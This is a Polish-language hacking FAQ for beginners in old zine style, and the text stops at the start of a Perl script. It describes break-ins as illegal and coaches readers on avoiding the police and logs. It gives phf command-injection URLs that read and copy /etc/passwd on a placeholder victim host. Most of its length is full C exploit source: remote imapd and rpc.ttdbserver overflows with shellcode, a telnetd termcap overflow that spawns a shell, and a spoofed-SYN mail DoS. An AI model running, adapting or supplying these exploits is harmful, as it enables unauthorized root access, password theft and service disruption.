* --------------------------------------------- *	             __
*                 MiB1 FAQ                      *	|-|  |-|  /-|  |-\               |-|  /-/
* --------------------------------------------- *	|-|--|-|  |-|--|-|     ____      |-| /-/
*                                               *	|-|--|-|  |-|  |-|   /-/----     |-|/-/
* Ten dokument sluzy jednynie celom edukacyjnym *	|-|  |-|            /-/          |-/-/
*  jezeli go przeczytasz nic ci sie nie stanie 	*			    \-\____      |-\-\
*        			          	*		             \-\----     |-|\-\
*        			                * 				         |-| \-\
*                                               *         			         |-|  \-\
 \                                               \
  \ 						  \
   \						   \
    \						    \
     \						     \
      \					              \
       \				               \
        \					        \
         \						 \
          \						  \
           \						   \
	    *   --->    Spis czy cos w tym stylu    <---    *
            *                                               *
            *         Podztawy ... (mom i'm a lamer)        *
            *                                               *
            *    1.Co to jest hack (home ?)                 *
            *    2.Jak dziala internet (?)                  *
            *    3.Hack jest nielegalny (busted)            *
            *    4.Pojecia (format c:)                      *
            *                                               *
            *                                               *
            *        Jedziemy ... (mom i'm no lamer)        *
            *                                               *
            *    1.Unix (z czym to sie je)                  *
            *    2.Haslo (po co ?)                          *
            *    3.Trojany (konik...)                       *
            *    4.Php,phf (umylem raczki)                  *
            *    5.Sendmail (pocztowki)                     *
            *    6.Exploits (terminator!)                   *
            *                                               *
            *                                               *
            *         Let's hack for real (kill)            *
            *                                               *
            *    1.Kill (zabic server czy nie zabic ?)      *
            *    2.Miec konto, miec roota                   *
            *    3.ROOT, co dalej ?                         *
            *    4.XXX (porno hasla?)                       *
            *    5.Admin czowa                              *
            *    6.Uciekaj ! (ups nie udalo sie)            *
            *                                               *
            *                                               *
            *           INNE sposoby na zycie               *
            *                                               *
            *    1.Lubie ludzi                              *
            *    2.Kupuje przez internet                    *
            *    3.Phreak (hahahah)                         *
            *    4.Ludzie                                   *
            *    5.Linki                                    *
            *    6.Grupy hack                               *
            *************************************************
   			   **********  
			**********        
      		     **********		     
		  **********		        
	       **********                          
	    **********                                 
********************************************************************************

*----------------------->Podztawy ... (mom i'm a lamer)<-----------------------*

********************************************************************************
*                                                                              *
*   --------------->  1.Co to jest hack                                        *
*                                                                              *
*  HACK jest to wejscie (zalogowanie) sie na inny komputer poprzez siec.Lub    *
* inaczej wejscie na ten komp wykasowanie zamieszczenie apelu o czyms tam      *
* i podczas tego nie dostac sie w rece policji ani w rece administratora.      *
*                                                                              *
*   --------------->  2.Jak dziala internet                                    *
*                                                                              *
*  Hmmm jezeli tego nie wiesz to nie powinienies tego czytac ale poniewaz jest *
* to faq dla poczatkujacych to napisze pare slow(musisz posiadac jakas wiedze) *
* FTP-laczac sie przez ta usluge mozesz wgrywac rzeczy na server               *
* TELNET-laczysz sie z serverem i masz mozliwosc uruchamiac NA NIM programy    *
* SSH-taki telnet nie bede sie wglebial ta sama zasada tylko ze inny system    *
* kodowania.                                                                   *
*                                                                              *
*   --------------->  3.Hack jest nielegalny                                   *
*                                                                              *
*  HACK jest NIELEGALNY.Nigdy sie nie chwal ze cos schakowales,nikdy nie mow   *
* kumplom lub pociskaj glupoty ze jestes lama.Nie daj sie zlapac(logi dalej)   *
* UWAZAJ....czytaj dalsze linijki a znajdziesz sposoby na bezpieczny hack.     *
* Nigdy nie mow o hacku niby kolegom na netcie.                                *
*                                                                              *
*   --------------->  4.Pojecia                                                *
*                                                                              *
*  Pojecia:                                                                    *
*  faq-tekst o tematyce hack/phreak/crack/virus                                *
*  irc-intercostam relation chat programik do gadania                          *
*  hack-hacking                                                                *
*  shit95-windows95                                                            *
*  shit-windows                                                                *
*  shit2000-windows2000                                                        *
*  red hat-linux                                                               *
*  telnet-programik pod shita do podlaczenia na inny komp                      *
*  trojan-kon trojanski czyli tool do zdalnego administrowania                 *
*  backdoor-tylne drzwi do systemu czyli egzotyczny port hackera :)            *
*  ssh-taki telnet tylko inny system szyfrowania                               *
*  shell-tryb kata jakie dostajesz na servie                                   *
*                                                                              *
*                                                                              *
********************************************************************************

*---------------------->Jedziemy ... (mom i'm no lamer)<-----------------------*

********************************************************************************
*                                                                              *
*   --------------->  1.Unix                                                   *
*                                                                              *
*  UNIX jest to system operacyjny nie nakladka,jezeli uzywales windy to jest   *
* on zmutowanym dos-em.Jest to system tekstowy posiadajaca MC (NC) midnight    *
* commander,a takze nakladke podobna troche do windy.Zaleta tego systemu sa    *
* niskie wymagania,niezawodnosc.Trzeba poznac podztawy (komendy):              *
*                                                                              *
* ls/dir-pokazuje zawartosc katalogu                                           *
* tar-rozpakowywanie                                                           *
* ./plik1-uruchamianie pliku plik1                                             *
* finger-programik do sprawdzania kto jest w tym momencie na servie            *
* pico-program (lamerski) do obslugi poczty                                    *
* screen-odpalanie procesu w tle                                               *
* rm-kasuje plik                                                               *
* pwd-pokazuje katalog w ktorym jestes                                         *
* passwd-zmiana hasla                                                          *
* mkdir-tworzy katalog                                                         *
* gcc plik-kompilacja pliku                                                    *
* cat-prosty edytor tekstow                                                    *
*                                                                              *
*   --------------->  2.Hasla                                                  *
*                                                                              *
*  UNIX przechowuje plik z haslami w katalog /etc a plik ten nazywa sie passwd *
* czyli /etc/passwd                                                            *
* Inne systemy operacyjne maja hasla w innych miejscach np (z 2600 faq)        *
*                                                                              *
*AIX 3                 /etc/security/passwd            			       *
*       or             /tcb/auth/files/<pierwsza litera username>/<username>   *
*A/UX 3.0s             /tcb/files/auth/?/*				       *
*BSD4.3-Reno           /etc/master.passwd              			       *
*ConvexOS 10           /etc/shadpw                     			       *
*ConvexOS 11           /etc/shadow                     			       *
*DG/UX                 /etc/tcb/aa/user/               			       *
*HP/IX                 /etc/shadow                                             *
*HP-UX                 /.secure/etc/passwd                                     *
*IRIX 5                /etc/shadow                                             *
*Linux 1.1             /etc/shadow                                             *
*OSF/1                 /etc/passwd[.dir|.pag]                                  *
*SCO Unix #.2.x        /tcb/auth/files/<pierwsza litera username>/<username>   *
*SunOS4.1+c2           /etc/security/passwd.adjunct    ##username              *
*SunOS 5.0             /etc/shadow				               *
*                      <optional NIS+ private secure maps/tables/whatever>     *
*System V Release 4.0  /etc/shadow          				       *
*Ultrix 4              /etc/auth[.dir|.pag]                                    *
*UNICOS                /etc/udb                                                *
*                                                                              *
* Naszym glownym zadaniem bedzie dostac ten wlasnie plik.Jak wiecie w UNIXsie  *
* kazdy user ma ograniczony dostep.Ty posiadajac konto shellowe nie mozesz     *
* przegrac sobie pliku passwd musisz miec dostep root (patrz dalej).           *
*                                                                              *
*     [login]::[user#]:[group#]:[opis]:[katalog domowy]:[katalog shella]       *
*                                                                              *
* tak wyglada standardowy passwd jezeli zamiast password jest *,x,y lub jakis  *
* znaczek to znaczy ze ten plik to tylko podpucha a prawdziwe hasla sa w pliku *
* /etc/shadow i potrzebny ci bedzie razem z passwd zeby dostac hasla.          *
* Zeby zdekodowac hasla jest potrzebny programik john the ripper najlepiej 1.5 *
*                                                                              *
*   --------------->  3.Trojany                                                *
*                                                                              *
*  Takie programiki zeby pomieszac komus na dysku .. szczeze ich nie lubie sa  *
* lamerskie nie bede o nich pisal najwazniejsze to wiedziec ze netbus i inne,  *
* w tym prosiaczek skladaja sie z dwoch czesci dla ciebie i ofiary.            *
*                                                                              *
*   --------------->  4.Php,phf                                                *
*                                                                              *
*  Bardzo popularne dziury lecz malo skuteczne i do tego zostawiaja LOGI!!     *
* Nawet tak bardzo popularny programik jak "skaner" zostawia logi na servie.   *
* Jezeli np. robiles skan na fbi.gov maja twoje logi i za 30 min ktos sie do   *
* nick wlamal to idziesz siedziec :)                                           *
*                                                                              *
* Zamieszczam pare ciekawych dziur:                                            *
*   								               *
* http://www.ofiara.pl/cgi-bin/php.cgi?/etc/passwd			       *
* http://www.ofiara.pl/~root/etc/passwd                                        *
* http://www.ofiara.pl/~bin/etc/passwd                                         *
* http://www.ofiara.pl/projects/archeo/wwwboard                                *
* http://www.ofiara.pl/_vti_prt/service.pwd                                    *
* http://www.ofiara.pl/~user/_vti_prt/service.pwd                              *
* http://www.ofiara.pl/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd           *
* http://www.ofiara.pl/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna    *
* me=&Qoffice_phone=  						               *
* http://www.ofiara.pl/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=    *
* haqr&Qemail=&Qnickname=&Qoffice_phone=				       *
* http://www.ofiara.pl/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd    *
* %0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=                     *
* http://www.ofiara.pl/~someuser/passwd                                        *
* http://www.ofiara.pl/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname    *
* =haqr&Qemail=&Qnickname=&Qoffice_phone=                                      *
*                                                                              *
*   --------------->  5.Sendmail                                               *
*                                                                              *
*  Nie zastanawia ciebie czasami jaki programik odpowiada za wysylanie poczty? *
* To jest wlasnie sendmail .. a co to oznacza nowe dziury i nowe sposoby na    *
* pozyskanie hasel :)         						       *
*                                                                              *
* A wiec nie bede sie rozpisywal na temat starych dziur ktore juz nie dzialaja *
* wiec zamieszczam ten skaner od lcamtufa:                                     *

---CUT HERE---
// Sendmail-SCANNER 1.0b
// (c) lcamtuf '97
// E-mail: lcamtuf@polbox.com

#include <stdio.h>
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>

#define TIMEOUT 5

FILE *server;
int sock,to;

void timeout(int signo) { to=1; };

void sm(char *host) {
  char inbuf[1024];
  struct sockaddr_in sin;
  struct hostent *hp;
  int x;
  hp=gethostbyname(host);
  if (h_errno!=0) {
    printf("Nie moge namierzyc %s, pomijam...\n",host);
    return;
  }
  bcopy(hp->h_addr,(char *) &sin.sin_addr,hp->h_length);
  sin.sin_family=hp->h_addrtype;
  sin.sin_port=htons(25);
  sock=socket(AF_INET,SOCK_STREAM,0);
  if (-1<connect(sock,(struct sockaddr *) &sin,sizeof(sin)))
    printf("Polaczenie z %s: ", host);
  else {
    printf("Nie moge polaczyc sie z %s, pomijam...\n",host);
    return;
  }
  server=fdopen(sock,"a+");
  while(1) {
    signal(SIGALRM,timeout);
    to=0;
    alarm(TIMEOUT);
    x=recv(sock,inbuf,1024,0);
    alarm(0);
    if (x==-1) {
      printf("(polaczenie przerwane)\n");
      break;
    }
    if (to) {
      printf("(przekroczony czas oczekiwania)\n");
      break;
    }
    if (strlen(inbuf)!=0) {
      for (x=3;x<strlen(inbuf);x++) 
        if (inbuf[x]==';') inbuf[x]=0; else
          if ((inbuf[x]==',')&&(inbuf[x-3]==' ')) inbuf[x-3]=0;
      printf("%s\n",inbuf);
      break;
    }
  }
  close(sock);
}                       

void main(int argc,char *argv[]) {
  FILE* f;
  char srv[1024];
  int ile=0,a;
  printf("Sendmail-SCANNER 1.0b -- (c) lcamtuf '97\n\n");
  if (argc!=2) {
    printf("  Ten program sprawdza wersje sendmaila na serwerach podanych");
    printf("  w pliku.\n  Liste serwerow mozna utworzyc za pomoca programu");
    printf("  HTML2SRV.\n");
    printf("  Sposob uzycia: SMSCAN plik_z_lista_serwerow\n");
    exit(1);
  }
  f=fopen(argv[1],"r");
  if (f==NULL) {
    printf("Nie moge otworzyc podanego pliku.\n");
    exit(1);
  }
  while (fgets(srv,1024,f)) {
    for (a=0;a<=strlen(srv);a++) 
      if ((srv[a]=='\n')||(srv[a]=='\r')) srv[a]=0;
    if (strlen(srv)!=0) {
      sm(srv);
      ile++;
    }
  }
  fclose(f);
  printf("\nKoniec pracy. Sprawdzilem %d serwerow.\n",ile);
}
---CUT HERE---

*                                                                              *
*   --------------->  6.Exploits                                               *
*                                                                              *
*  O to POTEGA HACKERA albo umiesz pisac w C i piszesz sam  programiki albo    *
* sciagasz z netu ich maseeeee.                                                *
* Exploit to programik dzieki ktoremu mozemy uzyskac roota czyli panowanie nad *
* serverem lub kasowanie logow.                                                *
*                                                                              *
* Oto najlepsze exlopity:                                                      *
*                                                                              *

********************************************************************************
*       imapd remote overflow                                                  *
********************************************************************************

---CUT HERE---
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <netdb.h>

char *h_to_ip(char *hostname);

char *h_to_ip(char *hostname) {

  struct hostent *h;
  struct sockaddr_in tmp;
  struct in_addr in;

  h = gethostbyname(hostname);

  if (h==NULL) { perror("Resolving the host. \n"); exit(-1); }

  memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
  memcpy(&in,&tmp.sin_addr.s_addr,4);

return(inet_ntoa(in));
}

void banner(void) {
  system("clear");
  printf("\nIMAP Exploit for Linux.\n");
  printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n");
  printf(" Modifications: p1 (p1@el8.org)\n");
}

main(int argc, char **argv) {

  int fd;
  struct sockaddr_in sckdaddr;
  char *hostname;
  char buf[4092];
  int i=8;
  char realegg[] =
    "\xeb\x58\x5e"
    "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
    "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
    "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
    "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
    "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
    "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
    "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
    "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
    "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff"
    "/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
  char *point = realegg;
  buf[0]='*';
  buf[1]=' ';
  buf[2]='l';
  buf[3]='o';
  buf[4]='g';
  buf[5]='i';
  buf[6]='n';
  buf[7]=' ';

  banner();

  if (argc<2)  {
     printf("\nUsage: %s <hostname>\n\n", argv[0]);
     exit(-1);
  }

  hostname=argv[1];

  while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */
    buf[i++]=0x90;

  while(*point)
    buf[i++]=*(point++);

  buf[i++]=0x83; /* ebp */
  buf[i++]=0xf3;
  buf[i++]=0xff;
  buf[i++]=0xbf;
  buf[i++]=0x88; /* ret adr */
  buf[i++]=0xf8;
  buf[i++]=0xff;
  buf[i++]=0xbf;

  buf[i++]=' ';
  buf[i++]='b';
  buf[i++]='a';
  buf[i++]='h';
  buf[i++]='\n';

  buf[i++]=0x0;


  if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the
socket. \n");

  sckdaddr.sin_port=htons(143);
  sckdaddr.sin_family=AF_INET;
  sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname));

  if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0)
perror("Error with connecting. \n");

  printf("hmm: \n");
  getchar();
  write(fd,buf,strlen(buf)+1);
  printf("hmm: \n");
  close(fd);
}
---CUT HERE---

********************************************************************************
*       in.telnetd tgetent buffer overflow                                     *
********************************************************************************
---CUT HERE---



#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define filename "./termcap"
#define entry   "access|Gimme r00t:\\\n :"
#define bufsize 1300
#define default_offset 870    /* Should work...*/

char shellcode[] =
   "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a\x3e\x39\x29\x28\x39\x3c\xe8\xc6\xff\xff\xff/bin/sh";

long get_sp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(int argc, char *argv[]) {
   int i, fd, offs;
   long *bof_ptr;
   char *ptr, *buffer, *tempbuf;

   offs = default_offset;

   if(argc == 2) {
      printf("using offset: %d\n",atoi(argv[1]));
      offs = atoi(argv[1]);
   }

   if(!(buffer = malloc(bufsize))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }


  if(!(tempbuf = malloc(bufsize+strlen(entry) + 50))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }

   bof_ptr = (long *)buffer;
   for (i = 0; i < bufsize - 4; i += 4)
      *(bof_ptr++) = get_sp() - offs;

   ptr = (char *)buffer;
   for (i = 0; i < ((bufsize-strlen(shellcode)))/2 - 1; i++)
      *(ptr++) = 0x90;

   for (i = 0; i < strlen(shellcode); i++)
      *(ptr++) = shellcode[i];

   printf("Creating termcap file\n");

   snprintf(tempbuf, (bufsize+strlen(entry)+50), "%s%s:\n", entry, buffer);
   fd = open(filename, O_WRONLY|O_CREAT, 0666);
   write (fd, tempbuf, strlen(tempbuf));
   close(fd);
}

---CUT HERE---

********************************************************************************
*       rpc.ttdbserver remote overflow                                         *
********************************************************************************
---CUT HERE---

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>

#define PORT 0
#define BSIZE 1024

#if defined(SOLARIS)
# define SP 0xefffd618
# define LENOFS 80
char asmcode[]="\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x92\x03\xe0\x48\x90\x02\x60\x10\xe0\x02\x3f\xf0\xa2\x80\x3f\xff\xa0\x24\x40\x10\xd0\x22\x3f\xf0\xc0\x22\x3f\xfc\xa2\x02\x20\x09\xc0\x2c\x7f\xff\xe2\x22\x3f\xf4\xa2\x04\x60\x03\xc0\x2c\x7f\xff\xe2\x22\x3f\xf8\xa2\x04\x40\x10\xc0\x2c\x7f\xff\x82\x10\x20\x0b\x91\xd0\x20\x08\xff\xff\xff\xfc\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x2e\x2d\x63\x2e";
char NOP[]="\x80\x1c\x40\x11";
#endif

#if defined(HPUX)
# define SP 0x7b03cc10
# define LENOFS 84
char asmcode[]="\xeb\x40\x40\x02\x0b\x39\x02\x80\xd7\x40\x0c\x1e\xb7\x5a\x20\xb8\x0b\x5a\x02\x59\x0f\x21\x10\x98\x97\x18\x07\xff\x0f\x39\x12\x81\x0f\x20\x12\x99\xb7\x39\x20\x10\x0f\x20\x12\x1f\x0f\x59\x12\x89\xb7\x39\x20\x06\x0f\x20\x12\x1f\x0f\x59\x12\x91\x0b\x38\x06\x19\x0f\x20\x12\x1f\xb7\x59\x07\xe1\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x10\x16\x11\x11\x11\x11\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e";
char NOP[]="\x0b\x39\x02\x80";
#endif

#if defined(IRIX)
# define SP 0x7fff1b30
# define LENOFS 76
char asmcode[]="\x04\x10\xff\xff\x27\xe4\x01\x01\x24\x84\xff\x5e\x8c\x8c\xff\xe5\x24\x0d\xff\xff\x01\xac\x60\x23\x01\x84\x60\x20\xa1\x80\xff\xff\xa0\x80\xff\xff\xac\x84\xff\xed\x24\x84\xff\xfd\xa0\x80\xff\xff\xac\x84\xff\xec\x24\x84\xff\xf8\x24\x85\xff\xf0\xac\x84\xff\xf0\xac\x80\xff\xfc\x24\x02\x03\xf3\x02\x04\x8d\x0c\xff\xff\xff\xfc\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e";
char NOP[]="\x24\x0f\x12\x34";

#endif

#define TT_DBSERVER_PROG 100083
#define TT_DBSERVER_VERS 1
#define _TT_P 7

struct tt_reply {
  int i1;
  int i2;
};

void usage(char *s) {
  printf("Usage: %s [-ku] [-p port] [-f outfile] host cmd\n", s);
  exit(0);
}

bool_t xdr_tt_reply(XDR *xdrs, struct tt_reply *objp) {

  if (!xdr_int(xdrs, &objp->i1))
    return (FALSE);
  if (!xdr_int(xdrs, &objp->i2)) 
    return (FALSE);
  return (TRUE);
}

void make_file(char *fname, char *buf, int type);

main(int argc, char *argv[]) {
  extern int optind;
  extern char *optarg;
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct hostent *hp;
  struct sockaddr_in target;
  struct tt_reply op_res;
  char buf[64000], *path, *cmd, *host, *bp, *outfile = NULL;
  int sd, i, sp = SP, bsize = BSIZE, port = PORT, kill = 0, proto = 0;

  while ((i = getopt(argc, argv, "ukp:f:")) != EOF)
    switch (i) {
      case 'p':
        port = atoi(optarg);
        break;
      case 'k':
        kill = 1;
        break;
      case 'u':
        proto = 1;
        break;
      case 'f':
        outfile = optarg;
        break;
      default:
        usage(argv[0]);
    }
  if (argc - optind < 2)
    usage(argv[0]);
  cmd = argv[optind + 1];
  host = argv[optind];

  for (i = 0; i < sizeof(buf); i++)
    *(buf + i) = NOP[i % 4];

  i = bsize - strlen(asmcode) - strlen(cmd);
  i &= 0xfffffffc;
  strcpy(buf + i, asmcode);
  strcat(buf, cmd);
  *(int *)(buf + i + LENOFS) = ~(strlen(cmd) + 1);
  buf[strlen(buf)] = '.';
  bp = buf + bsize;
  for (i = 0; i < 16; bp+=4, i++)
    *(int *)bp = sp;
#ifdef IRIX
  sp = sp + 400 + 31652;
  for (i = 0; i < 5000; bp+=4, i++)
    *(int *)bp = sp;
  *bp++ = '/';
  *bp++ = 'f';
  path = buf + 2;
#else
  path = buf;
#endif
  *bp = 0;

  if (outfile) {
    make_file(outfile, buf, proto);
    printf("rpc datagram stored in %s\n", outfile);
    exit(0);
  }

  if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
    if ((hp = gethostbyname(host)) == NULL) {
      printf("%s: cannot resolve\n", host);
      exit(1); 
    } else
      target.sin_addr.s_addr = *(u_long *)hp->h_addr;
  }
  target.sin_family = AF_INET;
  target.sin_port = htons(port);
  sd = RPC_ANYSOCK;

  tm.tv_sec = 4;
  tm.tv_usec = 0;
  if (proto) 
    cl = clntudp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, tm, &sd);
  else
    cl = clnttcp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, &sd, 0, 0);
  if (cl == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
  tm.tv_sec = 10;

  if (kill) {
    path = NULL;
    bp = NULL;
    if ((stat = clnt_call(cl, 15, xdr_wrapstring, (char *)&path, 
        xdr_wrapstring, (char *)&bp, tm)) != RPC_SUCCESS) {
      clnt_perror(cl, "clnt_call");
      exit(1);
    }
    printf("Could not kill ttdbserver, reply is: %s\n", bp);
    exit(1);
  }

  if ((stat = clnt_call(cl, _TT_P, xdr_wrapstring, (char *)&path, xdr_tt_reply, 
       (char *)&op_res, tm)) != RPC_SUCCESS) {
    clnt_perror(cl, "clnt_call");
    exit(1);
  }
  printf("res i1 %d, res i2 %d\n", op_res.i1, op_res.i2);
  clnt_destroy(cl);
}

void make_file(char *fname, char *buf, int type) {
  int fd, offs;
  XDR xdrm;
  struct rpc_msg rpc_hdr;
  struct authunix_parms aup;
  char dgram[64000], rauth[MAX_AUTH_BYTES];

  if (type == 1) /* UDP */
    offs = 4;
  if ((fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0666)) == -1) {
    perror(fname);
    exit(1);
  }
  xdrmem_create(&xdrm, rauth, sizeof(rauth), XDR_ENCODE);
  aup.aup_time = (u_long)time(NULL);
  aup.aup_machname = "localhost";
  aup.aup_uid = 0;
  aup.aup_gid = 0;
  aup.aup_len = 0;
  aup.aup_gids = NULL;
  if (xdr_authunix_parms(&xdrm, &aup) == FALSE) {
    printf("error encoding auth cred\n");
    exit(1);
  }
  rpc_hdr.rm_call.cb_cred.oa_length = xdr_getpos(&xdrm);
  xdr_destroy(&xdrm);
  xdrmem_create(&xdrm, dgram + 4, sizeof(dgram), XDR_ENCODE);
  rpc_hdr.rm_xid = 0x12345678;
  rpc_hdr.rm_direction = CALL;
  rpc_hdr.rm_call.cb_rpcvers = 2;
  rpc_hdr.rm_call.cb_prog = TT_DBSERVER_PROG;
  rpc_hdr.rm_call.cb_vers = TT_DBSERVER_VERS;
  rpc_hdr.rm_call.cb_proc = _TT_P;
  rpc_hdr.rm_call.cb_cred.oa_flavor = AUTH_UNIX;
  rpc_hdr.rm_call.cb_cred.oa_base = rauth;
  rpc_hdr.rm_call.cb_verf.oa_flavor = AUTH_NONE;
  rpc_hdr.rm_call.cb_verf.oa_base = NULL;
  rpc_hdr.rm_call.cb_verf.oa_length = 0;
  if (xdr_callmsg(&xdrm, &rpc_hdr) == FALSE) {
    printf("error encoding rpc header\n");
    exit(1);
  }
  if (xdr_wrapstring(&xdrm, &buf) == FALSE) {
    printf("error encoding rpc data\n");
    exit(1);
  }
  /* record marking */
  *(u_int *)dgram = 0x80000000 | xdr_getpos(&xdrm);
  if (write(fd, dgram + offs, xdr_getpos(&xdrm) + 4) == -1) {
    perror("write");
    exit(1);
  }
  xdr_destroy(&xdrm);
  close(fd);
}
---CUT HERE---

********************************************************************************
*       Sendmail/Qmail DoS                                                     *
********************************************************************************

---CUT HERE---
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define SLEEP_UTIME 100000 /* modify it if necessary */

#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct tcphdr))
#define OFFSETTCP  (sizeof(struct iphdr))
#define OFFSETIP   (0)

u_short cksum(u_short *buf, int nwords)
{
        unsigned long sum;
        u_short *w = buf;

        for (sum = 0; nwords > 0; nwords-=2)
                sum += *w++;

        sum = (sum >> 16) + (sum & 0xffff);
        sum += (sum >> 16);
        return ~sum;
}

void resolver (struct sockaddr * addr, char *hostname, u_short port)
{
        struct  sockaddr_in *address;
        struct  hostent     *host;

        address = (struct sockaddr_in *)addr;

        (void) bzero((char *)address, sizeof(struct sockaddr_in));
        address->sin_family = AF_INET;
        address->sin_port = htons(port);
        address->sin_addr.s_addr = inet_addr(hostname);

        if ( (int)address->sin_addr.s_addr == -1) {
                host = gethostbyname(hostname);
                if (host) {
                        bcopy( host->h_addr,
                        (char *)&address->sin_addr,host->h_length);
                } else {
                        perror("Could not resolve address");
                        exit(-1);
                }
        }
}

int main(int argc, char **argv)
{
        char runchar[] = "|/-\\";
        char packet[PACKETSIZE],
        *fromhost,
        *tohost;

        u_short fromport        = 3000,
                toport          = 25;

        struct sockaddr_in local, remote;
        struct iphdr    *ip     = (struct iphdr*)  (packet + OFFSETIP);
        struct tcphdr   *tcp    = (struct tcphdr*) (packet + OFFSETTCP);

        struct  tcp_pseudohdr
        {
                struct in_addr saddr;
                struct in_addr daddr;
                u_char zero;
                u_char protocol;
                u_short lenght;
                struct tcphdr tcpheader;
        } pseudoheader;

        int sock, result, runcharid = 0;

        if (argc < 3)
        {
                printf("usage: %s fakeaddr victim [port]\n", argv[0]);
                exit(0);
        }
        if (argc == 4)
                toport = atoi(argv[3]);

        bzero((void*)packet, PACKETSIZE);
        fromhost = argv[1];
        tohost = argv[2];

        resolver((struct sockaddr*)&local, fromhost, fromport);
        resolver((struct sockaddr*)&remote, tohost, toport);

        sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (sock == -1) {
                perror("can't get raw socket");
                exit(1);
        }

        /* src addr */
        bcopy((char*)&local.sin_addr, &ip->saddr,sizeof(ip->saddr));
        /* dst addr */
        bcopy((char*)&remote.sin_addr,&ip->daddr,sizeof(ip->daddr));

        ip->version = 4;
        ip->ihl     = sizeof(struct iphdr)/4;
        ip->tos     = 0;
        ip->tot_len = htons(PACKETSIZE);
        ip->id      = htons(getpid() & 255);
        /* no flags */
        ip->frag_off = 0;
        ip->ttl     = 64;
        ip->protocol = 6;
        ip->check   = 0;

        tcp->th_dport = htons(toport);
        tcp->th_sport = htons(fromport);
        tcp->th_seq   = htonl(32089744);
        tcp->th_ack   = htonl(0);
        tcp->th_off   = sizeof(struct tcphdr)/4;
        /* 6 bit reserved */
        tcp->th_flags = TH_SYN;
        tcp->th_win   = htons(512);

        /* start of pseudo header stuff */
        bzero(&pseudoheader, 12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=local.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=remote.sin_addr.s_addr;
        pseudoheader.protocol = 6;
        pseudoheader.lenght = htons(sizeof(struct tcphdr));
        bcopy((char*) tcp, (char*) &pseudoheader.tcpheader,
                sizeof(struct tcphdr));
        /* end */

        tcp->th_sum   = cksum((u_short *) &pseudoheader,
                                12+sizeof(struct tcphdr));
        /* 16 bit urg */

        while (0)
        {
                result = sendto(sock, packet, PACKETSIZE, 0,
                        (struct sockaddr *)&remote, sizeof(remote));
                if (result != PACKETSIZE)
                {
                        perror("sending packet");
                        exit(0);
                }
                printf("\b");
                printf("%c", runchar[runcharid]);
                fflush(stdout);
                runcharid++;
                if (runcharid == 4)
                        runcharid = 0;
                usleep(SLEEP_UTIME);
        }

        return 0;
}
---CUT HERE---

********************************************************************************
*       Netscape Buffer Overflow                                               *
********************************************************************************

---CUT HERE---
#!/usr/bin/perl
#
